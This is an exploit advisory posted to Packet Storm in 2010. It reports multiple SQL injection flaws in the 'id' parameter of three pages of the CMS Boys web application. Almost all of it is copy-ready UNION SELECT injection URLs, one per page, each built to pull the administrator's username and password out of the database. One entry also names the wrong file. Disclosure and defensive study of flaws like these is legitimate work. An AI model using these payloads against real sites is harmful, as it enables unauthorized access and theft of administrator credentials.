CMS Boys SQL Injection

2010-02-03T00:00:00
ID PACKETSTORM:85886
Type packetstorm
Reporter MizoZ
Modified 2010-02-03T00:00:00

Description

                                        
                                            `/*  
  
Name : CMS BOYS (id) Multiple SQL Injection  
WebSite : http://www.cmsboys.com/  
Demo : http://www.cmsboys.com/democms/  
  
Author : Hamza 'MizoZ' N.  
Email : mizozx@gmail.com  
  
Greetz : Zuka , PR0f.SELLIM , Dyle , Achille Dark3r , geeksec.com  
  
*/  
  
# 1st :  
  
File : news_detail.php , GET : id  
  
[HOST]/[PATH]/news_detail.php?id=[INJECTION]  
  
Exploit :  
  
[HOST]/[PATH]/news_detail.php?id=-15+union+select+1,2,3,4,concat(admin_username,0x3a,admin_password)  
  
+from+admin_table--  
  
# 2nd :  
  
File : news_detail.php , GET : id  
  
[HOST]/[PATH]/poker_reviews.php?id=[INJECTION]  
  
Exploit :  
  
[HOST]/[PATH]/poker_reviews.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat  
  
(admin_username,0x3a,admin_password),12,13+from+admin_table--  
  
# 3th :  
  
File : tournaments_detail.php , GET : id  
  
[HOST]/[PATH]/tournaments_detail.php?id=[INJECTION]  
  
Exploit :  
  
[HOST]/[PATH]/tournaments_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat  
  
(admin_username,0x3a,admin_password)+from+admin_table--  
`